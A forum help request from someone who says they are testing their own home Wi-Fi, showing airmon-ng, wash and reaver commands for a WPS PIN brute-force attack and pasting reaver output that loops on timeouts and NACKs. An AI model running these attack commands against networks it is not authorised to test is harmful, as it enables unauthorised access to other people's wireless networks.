Hi guys,
I've recently tried to penetration test my home Wi-Fi and I used the reaver tool to exploit the WPS vulnerability.
This is what I did:

airmon-ng start wlan0
wash -i wlan0

The Wi-Fi card was in monitor mode and the WPS was not locked on my router. I did this repeatedly, even for an hour once.

This is what I got:
root@kali:~# reaver -i mon0 -b ##:##:##:##:##:## (THE BSSID) -c 1 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from (THE BSSID)
[+] Associated with (THE ESSID) (THE BSSID)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

This keeps looping and I can't get reaver to actually try a WPS Pin, my Wifi card is the Intel Centrino 2230 and injection works completely fine.
Please tell me how to fix these errors, I have already tried:
--no-nacks
-vvv
-F 15 to 25 framerates
-T 0.5 to 3 seconds

Please help, thanks.